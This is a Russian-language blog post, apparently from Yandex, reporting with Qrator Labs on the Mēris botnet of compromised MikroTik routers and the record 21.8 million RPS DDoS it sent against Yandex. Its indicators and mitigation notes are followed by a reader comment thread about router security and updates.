image

На днях в СМИ появилась информация о DDoS-атаке на Яндекс. Это правда, но не вся. Нашим специалистам действительно удалось отразить рекордную атаку более чем в 20 млн RPS — это самая крупная атака из известных за всю историю интернета. Но это лишь одна из множества атак, направленных не только на Яндекс, но и на многие другие компании в мире. Атаки продолжаются уже несколько недель, их масштабы беспрецедентны, а их источник – новый ботнет, о котором пока мало что известно.

Сегодня вместе с коллегами из Qrator Labs мы хотим поделиться текущими результатами совместного расследования деятельности нового ботнета Mēris. Расследование еще продолжается, но мы считаем важным поделиться уже собранной информацией со всей индустрией.

В конце июня 2021 года и мы в Яндексе, и наши коллеги из Qrator Labs начали замечать признаки новой атакующей силы в глобальной сети – ботнета нового типа. Обнаруженный ботнет уже тогда обладал значительными масштабами – десятки тысяч устройств, но их количество быстро растет и сейчас. Qrator Labs наблюдали 30 000 хостов в отдельных атаках, мы в Яндексе собрали данные о 56 000 атакующих устройств. Но мы предполагаем, что истинное количество значительно больше – вероятно, более 200 000 устройств. Полная сила ботнета не видна из-за ротации устройств и отсутствия у атакующих желания показывать всю имеющуюся мощность. Более того, устройства в ботнете являются высокопроизводительными, а не типичными девайсами «интернета вещей», подключенными к сети Wi-Fi. С наибольшей вероятностью ботнет состоит из девайсов, подключенных через Ethernet-соединение, – в основном, сетевых устройств.

Некоторые организации уже окрестили этот ботнет «вернувшимся Mirai». Но мы не считаем такое определение в достаточной степени точным. Mirai обладал большим количеством зараженных устройств, объединенных под управлением единого командного центра, и атаковал он, в первую очередь, трафиком сетевого уровня.

У нас еще не было возможности изучить пример вредоносного кода, который используется для заражения новых устройств данного ботнета, и мы не готовы утверждать, относится он к семейству Mirai или нет. Пока считаем, что нет, поскольку устройства, объединенные под единым командным центром, похоже, относятся только к производителю Mikrotik.

Это и есть причина, по которой мы хотели дать другое имя новому ботнету, работающему под еще не пойманным командным центром. Коллеги из Qrator Labs выбрали Mēris – по-латышски «чума». Такое название кажется уместным и относительно близким к Mirai по произношению.

Особенности ботнета Mēris:
  • Использование конвейерной обработки (pipelining в HTTP/1.1) для организации DDoS-атак (подтверждено)
  • Атаки ориентированы на эксплуатацию RPS (подтверждено)
  • Открытый порт 5678/TCP (подтверждено)
  • SOCKS4-прокси на зараженном устройстве (не подтверждено, хотя мы знаем, что устройства Mikrotik используют SOCKS4)

На момент публикации этой статьи мы не знаем точно, какие именно уязвимости приводят к тому, что устройства Mikrotik подвергаются настолько крупномасштабному захвату. Несколько записей на форуме производителя указывают, что пользователи устройств Mikrotik с 2017 года замечали попытки взлома на старых версиях RouterOS, особенно 6.40.1. Если мы и правда видим старую уязвимость, все еще активную на десятках тысяч устройств, которые не обновляются, – это очень плохие новости. Однако данные Яндекса и Qrator Labs указывают, что это, скорее всего, не так. В ботнете мы видим множество версий RouterOS последних трех лет – вплоть до последней стабильной. Наибольшая доля приходится на предпоследнюю версию.



Еще один достаточно очевидный момент – ботнет продолжает расти. У нас есть предположение, что он может разрастаться за счет техники брутфорса (перебора паролей), хотя этот вариант не кажется основным. Вся ситуация больше указывает на то, что уязвимость либо хранилась в секрете до начала полномасштабной кампании, либо была продана на черном рынке.

В наши задачи не входит исследование первопричин и поиск виновных – сосредоточимся на дальнейших наблюдениях.

В последние пару недель все мы стали свидетелями разрушительных DDoS-атак в Новой Зеландии, США и России. Все эти атаки мы ассоциируем с ботнетом Mēris. В настоящий момент он может перегрузить практически любую сетевую инфраструктуру, включая некоторые сети высокой надежности, специально созданные, чтобы выдерживать подобную нагрузку. Главный признак ботнета – чудовищный показатель RPS.

Cloudflare была первой компанией, которая публично рассказала об атаках подобного масштаба. В посте в блоге от 19 августа они упоминали об атаке, достигшей 17 млн запросов в секунду. Мы сообщили Cloudflare, что в сентябре наблюдали схожую картину по продолжительности и распределению стран-источников.

image
График RPS DDoS-атаки на Яндекс 5 сентября 2021 года

Яндекс стал одной из компаний, испытавших на себе возможности ботнета Mēris. К счастью, наша техническая команда смогла нейтрализовать атаку и предотвратить отказ в обслуживании. Атака не повлияла на работу сервисов, и данные пользователей не пострадали. Хотя цифры все еще ошеломляют – почти 21,8 млн RPS. Это крупнейшая в истории зарегистрированная атака на уровне приложения (L7 DDoS attack).

А вот статистика роста масштаба атак ботнета Mēris на нас:

7 августа – 5,2 млн RPS
9 августа – 6,5 млн RPS
29 августа – 9,6 млн RPS
31 августа – 10,9 млн RPS
5 сентября – 21,8 млн RPS

Службе информационной безопасности Яндекса удалось установить детали внутреннего устройства ботнета. Для взаимодействия внутри сети используются обратные L2TP-туннели, а количество зараженных устройств достигает 250 000.

Как именно Яндекс выдержал такое огромное количество запросов в секунду?

В Яндексе входящий трафик пользователей проходит через несколько инфраструктурных компонентов, работающих на разных уровнях модели ISO/OSI. Первые компоненты защищают Яндекс от SYN-флуд-атак. Следующие слои анализируют входящий трафик в режиме реального времени. На основе технических сигналов и других статистик система оценивает подозрительность каждого запроса. Наш приоритет – выдать ответ живым пользователям даже в момент DDoS-атаки. Благодаря устройству нашей инфраструктуры мы быстро горизонтально отмасштабировали наши компоненты уже после первых атак и смогли выдержать более мощные волны, не переключаясь в режим бана по IP.

Источники атак (IP-адреса), которые в данном случае не подменяются (не спуфятся), по всей видимости похожи в том, что у них открыты порты 2000 и 5678. Конечно, многие производители устройств размещают на этих портах собственные сервисы. Однако конкретная комбинация порта 2000 с «Bandwidth test server» и порта 5678 с «Mikrotik Neighbor Discovery Protocol» почти не оставляет почвы для сомнений в наших выводах. Хотя Mikrotik использует UDP для своего стандартного сервиса на порту 5678, на скомпрометированных устройствах обнаруживается открытый TCP-порт. Такая маскировка может быть одной из причин того, что владельцы зараженных устройств не замечали их странного поведения.

Основываясь на этом, мы решили проверить TCP-порт 5678 с помощью Qrator.Radar. Полученные нами данные удивляют и пугают одновременно.

image
Глобальное распределение открытых портов 5678: чем темнее цвет, тем больше устройств

Оказывается, в глобальной сети существует 328 723 активных хоста, отвечающих на запросы пробы по TCP на порту 5678. Конечно, не обязательно каждый из них – это уязвимый Mikrotik. Есть данные о том, что устройства Linksys тоже используют внутренний TCP-сервис на порту 5678. Возможно, Mikrotik и Linksys не единственные, но у нас нет другого выбора, кроме как предположить, что 328 723 – это и есть число хостов в активном ботнете.



Важно, что открытый порт 2000 отвечает на входящее соединение цифровой подписью \x01\x00\x00\x00, которая принадлежит протоколу RouterOS. Поэтому мы считаем, что это не случайный сервер для тестирования пропускной способности, а вполне идентифицируемый.

Цитируя неофициальное описание протокола на GitHub:

Официального описания нет, поэтому все было получено с помощью инструмента WireShark и RouterOS 6, запущенной в виртуальной машине, которая подключалась к реальному устройству. (...)

Установив TCP-соединение с портом 2000, сервер всегда сначала посылает команду «hello» (01:00:00:00). Если в клиенте указан протокол UDP, TCP-соединение все еще устанавливается.


По нашим наблюдениям, 65% атакующих устройств открывают SOCKS4-прокси на порту 5678, а 90-95% открывают Bandwidth test на порту 2000.


Топ стран с источниками ботнета Mēris в рекордной атаке на Яндекс

Использование конвейерной обработки HTTP (так это обозначается в HTTP/1.1, а в HTTP/2 это «мультиплексирование») делает нейтрализацию подобных атак давно забытой задачей. Дело в том, что сетевые устройства обычно установлены у легитимных пользователей. Невозможно быть уверенным, что конечная точка полностью скомпрометирована, превращена в «бота-зомби» и что в трафике атаки не занята лишь часть полосы (а остальная используется в безобидном трафике живого пользователя). В конце концов, на каком-то ресурсе могут быть зарегистрированы пользователи, пытающиеся попасть на него, даже используя скомпрометированные устройства.



Поскольку конвейерная обработка заставляет принимающий сервер отвечать на целый пакет мусорных запросов от одного источника, значит, оптимизация фронтенда может нанести еще больший ущерб при попытке ответить на каждый входящий запрос. И мы говорим об HTTP-запросах, на которые тратится бóльшая часть используемой вычислительной мощности сервера (тем более при защищенном соединении, когда к обработке незашифрованных запросов добавляется криптографическая нагрузка).

Конвейерная обработка – основной источник проблем для всех, кто встретит этот ботнет на своей инфраструктуре. Хотя браузеры (за исключением Pale Moon) в основном не используют конвейерную обработку, боты это делают, и с большим удовольствием. Такие запросы легко распознать и нейтрализовать, ведь все-таки общепринятый в интернете консенсус относительно обработки запросов выглядит как «запрос – ответ», а не как «запрос – запрос – запрос – запрос – ответ».

Сейчас мы наблюдаем реализацию стратегии «качество против количества». Из-за конвейерной обработки запросов злоумышленники могут выжать гораздо больше запросов в секунду по сравнению с «обычными» ботнетами. В том числе – потому, что классические методы нейтрализации попытаются заблокировать атакующий IP-адрес. Однако порядка 10-20 запросов, оставшихся в буферах, будут обработаны даже после этого.

Что делать в такой ситуации?

Черные списки все еще работают. Поскольку в этих атаках не происходит подмены IP-адреса источника (нет спуфинга, как мы уже упомянули), каждая жертва видит источник атаки таким, какой он есть на самом деле. Блокировки на короткий промежуток времени должно быть достаточно, чтобы предотвратить атаку и не побеспокоить конечного пользователя.

Неясно, как владельцы ботнета будут действовать в будущем. Они могут воспользоваться скомпрометированными устройствами полностью, в попытке использовать 100% доступной мощности (и по пропускной, и по вычислительной способности). Тогда не останется другого способа, кроме как блокировать каждый запрос, следующий за первым от одного источника, предотвращая обработку запросов в пайплайне.

Если на целевом сервере отсутствует защита от DDoS-атак, то не только конвейерная обработка запросов может стать катастрофой, поскольку злоумышленнику потребуется гораздо меньше «рабочей силы», чтобы заполнить порог RPS жертвы. Оказалось, очень многие не были готовы к подобному сценарию.

Что дальше?

Вчера нам удалось связаться с Mikrotik и предоставить им собранные данные. Кроме того, мы направили всю собранную информацию в профильные организации. Надеемся, что совместные усилия позволят интернету вскоре избавиться от пандемии этой «чумы».

Комментарии (145)


  1. volk
    09.09.2021 12:36
    +3

    А как читается это латышское название?


    1. vtv
      09.09.2021 12:45
      +2

      "мэрис", с ударением на "э"


      1. event1
        09.09.2021 16:27
        +11

        "мээрис". Черта над гласной ("макрон" по-научному) в латышском — это знак долготы.


  1. nin-jin
    09.09.2021 12:38
    +10

    Почему бы владельцам заражённых роутеров не выдавать страничку "ваш роутер скомпромитирован". А то пользователи же и не знают даже, что кого-то дедосят.


    1. cybersonner
      09.09.2021 12:43
      +3

      И владельцам роутеров объяснить, как проверить- заражен он или нет?

      Хотя, если MikroTik уведомлен об этом только вчера- решения пока скорее всего нет.


      1. ifap
        09.09.2021 12:47

        Почему бы и нет? За отдельную плату, разумеется.


        1. playnet
          09.09.2021 14:37
          +2

          а даже если и есть - у микротиков нет автообновления. Точнее, технически оно есть, но мне неизвестны публичные адреса для этого, там нужно что-то вписывать руками. Так что даже выпустив новую версию, если не заняться информированием обонентов о критическом обновлении, половина всех устройств получит обновление только через несколько лет..


          1. ifap
            09.09.2021 14:50

            Информирование абонентов в данном случае — отключение клиентов с вредоносным исходящим трафиком, это они сразу заметят ;)


            1. Konstantinus
              09.09.2021 15:32
              +8

              Компания Яндекс посчитала трафик от вашего роутера подозрительным. Мы вас отключаем?


              1. ifap
                09.09.2021 16:13

                А компания Яндекс — мой провайдер, в смысле ISP?


                1. Konstantinus
                  09.09.2021 21:54
                  +1

                  О том и речь, что если Яндекс не мой ISP, то какое дело моему ISP до того какие проблемы я создаю Яндексу (насколько понимаю трафик генерируется не очень большой).
                  Поэтому, думаю, никакого отключения платящих клиентов не будет.


                  1. Barnaby
                    09.09.2021 22:06

                    Айпишники ISPа в блеклисты улетят. Учитывая что сейчас везде динамические IP и NAT его это не обрадует.


                    1. 1tuz
                      10.09.2021 16:49

                      Тогда встаёт вопрос - как микротик за натом оказался заражён в первую очередь?


                      1. TeiSinTai
                        10.09.2021 17:33

                        Думаю, сейчас только энтузиасты делают монолитные вирусы, а профессиональные злодеи работают с комплексами. Купить у какого-нибудь другого ботнета возможность запуска нагрузки на компах пользователей - и вот уже есть выход на первые микротики за натами. Достаточно одного, чтобы выйти на остальные в ЛВС провайдера. Несколько стадий заражений и проникновений - вот и собран новый ботнет.


                  1. ifap
                    09.09.2021 22:23

                    Да рассылкой спама тоже проблемы создаются чужим клиентам, но провайдеры бьют за это ссаными тряпками.


            1. playnet
              09.09.2021 16:18
              +1

              У меня микрот например стоит для выдачи ipv6 (v4 - даёт кинетик), ну и как резерв для в4 если основной пров сломается. Если его заблочит -- я это замечу не раньше чем отвалится основной пров, что бывает раз в год, когда автооплата не прошла.


              1. ifap
                09.09.2021 16:47
                +2

                Дык проблема решена — исходящей вредоносной активности нет, а пользуетесь ли Вы при этом зараженным девайсом — Ваше личное дело. Как сказал мой пров: у себя в квартире можете делать, что хотите, но если DHCP начнет раздавать адреса в общую сеть — автоматом бан ;) Это он на мой вопрос: а не переел ли уважаемый пров ухи, запрещая клиентам поднимать у себя DHCP? Кривовато запрет был сформулирован, а по словам прова, недели не проходит, чтобы какой-нибудь умник не воткнул его провод во внутренние порты своего роутера ;)


                1. JerleShannara
                  09.09.2021 19:27
                  +2

                  Одни фирму, занимавшуюся (звучит весьма иронично) системами безопасности, много лет назад (во времена лимитных тарифов на интернет, когда безлимит если и был, то в виде 128Кбит — 1000р) чисто случайно удалось проучить, т.к. после получения IP от их DHCP сервера народ в локалке начал тупо через них сидеть в интернете. На посты на их форуме вида «почините свою чертову СКС» они вообще не реагировали, а вот IP от них часть народа получала обычно быстрее, чем от провайдера (т.к. их офис с сервером был ближе, чем провайдерский). В итоге была знатная ругань между провайдером и фирмой.


                1. scruff
                  10.09.2021 06:25
                  +4

                  Какой-то ламерский пров у вас - что мешает ему включить на всех своих портах DHCP Snooping или вообще резать весь исходящий трафик по портам DHCP?


                  1. ifap
                    10.09.2021 10:00

                    Полагаю, ничего не мешает и так он и делает.


                  1. webdi
                    14.09.2021 19:07
                    +1

                    Ох, так давно не видел слова "ламер" и производных от него...

                    Прям ностальжи... спасибо.)


                1. innomaker
                  10.09.2021 09:42

                  Честно говоря уже давно не встречал провайдеров у которых не было бы защиты от dhcp-серверов. В маленькой организации я такое ещё могу представить, но не у провайдера.


                  1. ifap
                    10.09.2021 10:01

                    А кто говорил, что у моего нету? Наверняка есть.


                    1. nochkin
                      10.09.2021 19:56
                      +1

                      Тогда ему тем более фиолетово как раздаётся DHCP.


          1. Knkplua
            09.09.2021 21:36

            У микротиков автообновление можно реализовать через скрипт и запускать его через планировщик заданий. Пример есть, кажется, на сайте с доками самого микротика. Но действительно это надо ручками, галочку поставить негде. Поэтому в сети до сих пор встречаются устройства с прошивками 5.хх


          1. Lennonenko
            14.09.2021 10:36

            автообновление реализуется однострочным скриптом

            UPD да, глупо было бы предполагать, что это до сих пор никто не написал ;))


      1. be52
        09.09.2021 13:22

        А он заражен? Всмысле был взломан через дыру или посаны просто пароль не поставили.


    1. dewil
      09.09.2021 12:43
      -5

      Хорошая мысль, кстати.
      А еще стоило бы как то ограничить продажу микротов "домохозяйкам".


      1. mikelavr
        09.09.2021 14:10
        +4

        Как вы предлагаете определять уровень квалификации покупателя?


        1. fougasse
          09.09.2021 14:21
          +36

          По красным глазам и свитеру летом, с оленями.


        1. dewil
          09.09.2021 15:05
          -8

          Никак, я озвучил только свои мысли.

          Навороченный прибор в руках хомяков, опасен как бомба. Что и подтверждается практикой.


          1. mikelavr
            09.09.2021 15:12
            +2

            Keenetic, как производитель роутеров бытового уровня, в прошивках версии 3.x ввел опцию "автообновление ПО". Сдается мне, в Mikrotik нужна такая же, и включенная по дефолту. Профессионалы её смогут отключить, конечно. Если найдут :).


            1. vikarti
              09.09.2021 20:09

              Как быть если конфиг… замысловатый и обновление что-то где то сломает?
              кстати а на какую ветку обновляем?
              long-term? stable? testing? development?


              1. mikelavr
                09.09.2021 20:10
                +1

                По умолчанию - stable.


                1. crazymassa
                  09.09.2021 23:52

                  Вы же знаете микрот, если сегодня им отправили, в stable это появится через год


                  1. scruff
                    10.09.2021 06:27
                    +1

                    Чем не повод пересесть с микры на что-нибудь поинтереснее и посекьюрнее?


                    1. JerleShannara
                      10.09.2021 13:02

                      На чего, чтобы с завода шло с таким кол-вом плюшек и возможностей? Cisco или Juniper? OpenWRT просьба не предлагать, как и решения вида «поставить линукс и самому».


                      1. scruff
                        10.09.2021 13:20
                        -3

                        А в чем собственно проблема с Cisco или Juniper? Или даже Palo Alto или Fortinet? Цена кусается? Ну всё правильно - хочешь секьюрность плати. Не хочешь - юзай микру. Линукс - как вариант не плох, но с грамотно настроенным fail2ban. Придётся конечно изрядно попотеть пару ночей чтобы это работало хотя бы на "удовлетворительно", и однозначно придется чем-то пожертвовать в функциональности.


                      1. JerleShannara
                        10.09.2021 13:23
                        +2

                        Именно, дорого. Микротик позволяет поиграть со «взрослыми» плюшками даже на совсем слабых девайсах.


                      1. scruff
                        10.09.2021 20:48
                        -1

                        ...и тем самым вы "by default" соглашаетесь, что на вашей микроше в любой момент может прописаться зловред. Согласен, микротик может и не плох, если у вас Small-Business и дырявый раутер для вас норм. Но пускать микру в более-менее серьезный Enterprise, где из-за утечки данных есть вероятность пострадать финансово или морально - ну б его нафиг, трижды подумал бы.


                      1. JerleShannara
                        10.09.2021 21:19
                        +1

                        Я точно также соглашаюсь, что на моей циске и джуне может прописаться зловред. Как и на моих серверах с Linux/Windows/FreeBSD/Solaris. Софт и железо без дыр — это как сферический конь в вакууме. Как говорят знающие люди: единственный безопасный планшет это силикатный кирпич.
                        П.С. В Сириос Бусинэсс защита обеспечивается не маркой одного устройства, а комплексом оборудования, софта, мер и т.д. Обосраться и слиться можно и с топовой циской, как и послать хакеров с крекерами в null на линуксовой машине с древним ядром.


            1. derwin
              10.09.2021 10:16

              микрот регулярно факапит на разных этапах. Я пару раз скатался за 200км, потом отключил "автообновление".


              1. Stesh
                10.09.2021 15:32

                Ну, справедливости ради, представляете себе автообновление на Cisco или Juniper?


                1. derwin
                  10.09.2021 15:37

                  Проблема микрота не в том, что что падает в процессе обновления. Нет! Проблема в том, что падает то, что не заявлено в патч-нотисах! Например, при входе в раздел "wifi" микрот начинал делать потери пакетов в 50%. Строго на определенной stable прошивке. Как так?! На форуме было разбирательство 1,5 месяца, где люди доказывали что они не верблюды, прежде чем выпустили хот-фикс. Чего тут повторять? открываешь раздел настроек и получаешь кирпич....


        1. Stesh
          09.09.2021 16:04
          +2

          Как вы предлагаете определять уровень квалификации покупателя?

          Просто продавать устройства без defconf )


          1. balamutang
            10.09.2021 14:27

            На следующий же день появится статья (возможно даже на хабре) "как настроить микрот" с кривейшим defconf, из которой юзер скопипастит все не глядя и запустит роутер.


            1. Stesh
              10.09.2021 15:29

              Тут подсказали, что еще хорошо бы выпускать микротик без QuickSet'а.


      1. trak
        09.09.2021 18:56
        +1

        Я честно говоря немного понимаю во всем этом, но микротики меня пугают. Тут недавно была статья с базовой настройкой, от которой у меня пропала охота его покупать. Я лучше по-старинке, люликс и iptables. Надеюсь это лучше, чем микротык в моих руках.


        1. buldo
          09.09.2021 19:45
          +3

          На самом деле в микротиках уже давно есть страница быстрой настройки, которая не сложнее того, что есть в тех же длинк.

          Статьи про безопасную настройку микротиков на Хабре - это больше для параноиков.


          1. AcidVenom
            09.09.2021 19:48
            +1

            Иииии… На MTCNA сразу же говорят забыть про ее существование.


            1. buldo
              09.09.2021 19:52

              Как я понимаю страница базовой настройки - это главный враг самому существованию MTCNA.

              Без страницы быстрой настройки я себе Nat уже не настрою ????


              1. AcidVenom
                09.09.2021 19:53

                Это далеко не так.


                1. buldo
                  09.09.2021 19:57

                  А что не так с настройкой, которую генерирует страница быстрой настройки после полного сброса устройства?


                  1. AcidVenom
                    09.09.2021 20:02

                    Возможна перенастройка существующих тоннелей, WiFi и т.д… С этой вкладкой нужно быть очень внимательным. Был неприятный опыт.


                    1. buldo
                      09.09.2021 20:04

                      Так это про существующие. А я имел в виду ситуацию покупки нового устройства и первоначальной настройки


                      1. AcidVenom
                        09.09.2021 20:26

                        1) Не добавились правила в Filter в том числе Fasttrack, не добавился ether1 в лист WAN.
                        2) Множество проблем при активации WiFi, начиная от WPA и заканчивая вещанием MAC.
                        3) При активации VPN активируются PPTP, SSTP, L2TP.


                      1. buldo
                        09.09.2021 20:33

                        Интересно. Надо репроверить. Особенно п1, так как у меня модель без WiFi. Спасибо.


        1. dewil
          09.09.2021 23:18
          -1

          Он не сложней любой cisco.

          У меня стоит микрот, я очень доволен его гибкостью.


          1. trak
            14.09.2021 13:25

            Я тоже купил себе по-факту. Реально крутая штука для дома. Но конечно не слишком интуитивоно после чистых OpenBSD или линуксов.


      1. Maccimo
        09.09.2021 22:56
        +5

        А еще стоило бы как то ограничить продажу микротов "домохозяйкам".

        Вас бешеный принтер покусал?


    1. AcidVenom
      09.09.2021 14:36

      Как технически вы предлагаете это сделать?


      1. vit1251
        11.09.2021 04:52

        Я думаю, что все в конечном итоге придет к сертификации и продаже с уймой всякого добра только компаниям. А весь смысл был как раз в организации сетей малого бизнеса, но в малом бизнесе принято всех выкидывать в том числе и админов и вот через какое-то время результат настигает.

        Был у меня опыт работы в одной компании где по началу даже файрвол не был включен и ничего люди работали и ничего не боялись. Правда история это не про Microtick.


    1. ximaera
      09.09.2021 22:57

      И выдавать эту страничку на скорости 20-30 млн. запросов в секунду ботам, которые не будут её читать, но будут очень рады, что заставили сервер её сгенерировать? Отличная идея!


      1. nin-jin
        09.09.2021 23:11

        Боты, на сколько я понял, не странички грузят. А пользователям странички и так отдаются - просто добавить к ним надпись и ссылку на инструкцию по обезвреживанию.


        1. simpleadmin
          10.09.2021 09:19

          Для того чтобы увидеть эту страничку пользователь должен обратиться к атакуемому серверу, а с учётом этого распределения мэрис

          владельцы атакующих устройств далеко не пользователи ya.ru


        1. ximaera
          10.09.2021 10:10
          -1

          Что, с вашей точки зрения, делают эти боты? Расскажите, пожалуйста.


  1. anonymous
    00.00.0000 00:00


    1. BarakAdama Автор
      09.09.2021 13:01
      +2

      Атака не повлияла на работу наших сервисов, данные пользователей не пострадали.


      1. avvor
        09.09.2021 15:07

        Сегодня лежал yandex cloud(было не зайти в админку, 20 минут назад заработал), лежал наш виртуальный сервер на yandex cloud, также у нас свой bid manager ставок для yandex direct и ведется лог ставок рекламных кампаний - с 9 утра на большинстве кампаний в direct показывает нулевые ставки за клик.


        1. RainbowJose
          09.09.2021 17:53

          У них сегодня с днс проблемы были. Читайте алерты.


          1. avvor
            09.09.2021 18:02

            Так вот проблемы по какой причине? Продолжалась атака?


            1. acc0unt
              09.09.2021 20:58
              +17

              Есть подозрение что проблемы с днс были из-за очередной атаки Роскомнадзора на здравый смысл и целостность сети.


              1. avvor
                09.09.2021 22:21
                +3

                Вчера писали что была дыра в безопасности устройств роскомнадзора, их хакнули и ддосили с устройств роскомнадзора на яндекс)) сегодня уже убрали все вчерашние новости и другая инфа)


          1. qwertyqwerty
            09.09.2021 22:16
            +1

            А где их можно прочитать? У меня тож седни были проблемы с облаком.


            1. avvor
              09.09.2021 23:17

              Я тоже не нашел, после этого комента и в гугле поискал и в админке yandex cloud, нигде не нашел ничего.



      1. aliend
        09.09.2021 16:05

        Алиса: нет связи с Интернетом . . .


  1. Burtanshy
    09.09.2021 13:40
    -31

    как интересно - снова микротик в ботнете, а поспрашиваешь знакомых - ни у кого проблем нет.

    вам не стыдно такое распространять? давайте лучше циску в таком обвините - примеров можно навалить. так и напишите в заголовке "сервера яндекса под циской участвуют в ддос атаке".


    1. ximaera
      09.09.2021 23:01
      +6

      У владельцев дырявых Микротиков особых проблем и не должно быть. Это задача владельца ботнета — сделать так, чтобы они ничего не заметили и не ресетнули роутер.


    1. ksr123
      10.09.2021 01:17
      +5

      Да, данные от ваших знакомых, несомненно, весомее серьезной статистики!


  1. lokkiuni
    09.09.2021 14:07
    +6

    Связана разделегация домена mynetname.net с этой атакой?


  1. altman
    09.09.2021 15:01

    У меня неприятные ассоциации... IT-коронавирус? Болезнь и симптомы уже есть, ни носителя ни лекарства (патча) пока нет, никто ничегоне знаети даже не понятно, насколько это серьезно...


    1. dewil
      09.09.2021 15:11
      +1

      IT вакцинация нужна :)


      1. Buzzzzer
        09.09.2021 15:17

        Теперь понятно почему РКН блокирует всё подряд. С эпидемией борется !


        1. ximaera
          09.09.2021 23:02
          +1

          Даёшь выход в Интернет по СМС и QR-коду! И разрешения выписывать по выгрузке из Пенсионного Фонда. С указанием цели доступа, на 60 минут в сутки.

          (я надеюсь, понятно, что это ирония?)


      1. fougasse
        09.09.2021 20:11
        +2

        IT-эвтаназия, скорее


  1. ahtox74
    09.09.2021 16:13

    А есть ли хэши вредоносных бинарных файлов?


  1. zlo1
    09.09.2021 16:17

    Устройства MikroTik давно в "лидерах" по предоставлению публичных прокси

    десятки тыс. socks4 на порту 5678 появились пару месяц назад - из более 150 стран


    1. ner0
      13.09.2021 21:48
      -2

      После таких заявлений, кто-то на хабре будет еще рекомендовать дырявый микротик ос?


  1. gus26
    09.09.2021 16:54

    Интересно, как вы просканили сети, тот же masscan очень быстро лочат на впс за нагрузку и незаконную дея-ть...


    1. ainu
      10.09.2021 13:57

      <irony>
      Сотрудники службы безопасности Яндекса пользовались впс на яндекс.клауде и не пускали админов клауда к панелям, чтобы они не забанили, пока СБ сканит интернет.
      И зря! Где это видано, чтобы компании типа яндекса сканировали Интернет? Не положено!
      </irony>

      Они написали, как: radar.qrator.net


  1. alexey_c
    09.09.2021 17:57
    +7

    Послушайте. Вот я - не домохозяйка, и могу забраться в свои микротики на предмет поковырять и что-нибудь проверить/отключить.

    Но я не настолько их фанат, чтобы знать всю внутреннюю кухню RouterOS, и писать скрипты в командной строке по памяти, мне реально не досуг заниматься её изучением до уровня админа.

    Все они у меня настроены без вывихов, максимум отключен Winbox

    Я думаю, таких пользователей довольно много.

    Поэтому был людейбы рад от людей знающих получить методы проверки наличия этой проблемы, включающий хоть что-нибудь кроме смены пароля.

    Обновить сбросить, поставить другие пароли и перенастроить заново ведь может не помочь.

    Винбокс в свое время просто отключали.

    А что отключить сейчас, коль есть такая проблема?


    1. Maxim_Q
      09.09.2021 18:28

      Кажется ботнет растет за счет zero day уязвимости, и пока не совсем понятно где проблема. Для начала нужно перенести все стандартные порты на другие и закрыть доступ к микротику из вне. Если закруть доступ нельзя тогда сделайте простой port knock для открытия порта. Это минимальные действия что приходят в голову.


      1. AcidVenom
        09.09.2021 18:37

        Ключевое слово «кажется».
        Основная проблема — неправильная настройка.
        port knock можно сделать всегда. Боитесь, что сломают? Используйте PSD.


        1. Maxim_Q
          09.09.2021 19:30
          +1

          не думаю что из-за неправильной настройки получилось подмять под себя 200 000 устройств. Явно есть дырка, давайте подождем ответа от самого микротика


          1. AcidVenom
            09.09.2021 19:35
            +1

            Во время ревизии на новом месте работы: из 25 шлюзов 3 были уже взломаны, около десятка — с неправильной конфигурацией.
            «Никогда не приписывайте злому умыслу то, что вполне можно объяснить глупостью»


            1. Maxim_Q
              09.09.2021 21:10

              У вас есть на примете уже взломанные устройства? Можете сказать какие есть признаки того что у вас в микротике сидит ботнет Meris? Ну кроме того что открыт порт 5678.


              1. AcidVenom
                09.09.2021 21:16

                Это было полтора года назад, устройства сразу же были локализованы и заменены. Из особенностей: все учетки переведены в группу read. Загрузчик переведен в режим Protected, что весьма осложнило сброс устройств.


              1. gangz
                10.09.2021 23:01
                +2

                Проверил все свои около 200 микротов на предмет несанкционированного изменения конфигов, не нашёл ни одного.

                Но 2 недели назад был на аудите у клиента, ему провайдер развернул WiFi сеть, в роли роутера поставил коммутатор CRS328, без дефолт-конфига, просто прописаны ипы и маскарадинг, всё, остальное пусто, фаер чистый, все службы включены, все доступы открыты, спасибо, хоть прошивку до последней обновил.

                Ясное дело, заметил следы взлома:

                1. Загрузка проца 100% (хоть у коммутаторов процы и слабые, но всё же)

                2. Включен SOCKS4

                3. Включен Web-proxy

                4. Разрешены внешние запросы к DNS

                Накатывание дефолт конфига, закрытие доступов и отключение SOCKS4, Web-proxy и DNS уронили нагрузку до 5%.

                После смены доступов периодически за ним наблюдаю, признаков взлома не появляется. Делаю вывод - все беды из-за рукожопого отношения к работе.



      1. maxwolf
        09.09.2021 18:58

        Кстати, как раз вчера тут был пост про настройки микротиков (в т.ч. и port knocking)


      1. badlv
        09.09.2021 23:30
        +1

        Сейчас кнокать, переназначать и закрывать делу не поможет и смысла в этом нет. Этим надо заниматься когда настраиваешь рутер. Input и Forward из WAN закрыты в defconf, а значит у 95 процентов пользователей. Но они в ботнете. Значит это zero day уязвимость в фаерволе или в обход фаервола? Единственное что сейчас может решить проблему: это update от Mikrotik, остальное бессмысленная имитация деятельности.


        1. Maxim_Q
          10.09.2021 15:55

          Ответ от Микротика по поводу ботнета: https://forum.mikrotik.com/viewtopic.php?f=21&t=178417

          Если в двух словах то этот ботнет микротики которые были скомпрометированны в 2018 году и сейчас в микротике нет явных дыр в безопастности RouterOS - это подтвердил независымый аудит.


          1. badlv
            10.09.2021 15:56

            В данном случае пока побуду Станиславским.


            1. maxwolf
              10.09.2021 17:50

              … что нетрудно, после быстрого взгляда на первую же диаграмму из поста: там не заметно превалирования до критично-уязвимых версий RouterOS, и объяснение этого от микротиковцев (апдейт накатили, а пароли не поменяли) также выглядит весьма натянуто…


  1. ynikitenko
    09.09.2021 18:12
    +1

    "Атаки ориентированы на эксплуатацию RPS (подтверждено)" - поясните, пожалуйста. В статье не полностью разобрался.


    1. ainu
      10.09.2021 14:00
      +2

      Атакующие не:
      1. Пытаются сделать огромный POST запрос
      2. Использовать уязвимость в протоколах или ПО атакуемых машин
      3. Открыть 100500 соединений и ждать
      4. Забить трафик гигабитами в секунду.
      5.… и т.д.

      Вместо этого они пытаются сделать много-много запросов.


  1. AlexGluck
    09.09.2021 19:00

    Вот эта статья о ддос вроде тоже ничего не дала, но гораздо лучше обезьян из сбера.


  1. Mur81
    09.09.2021 19:41
    +4

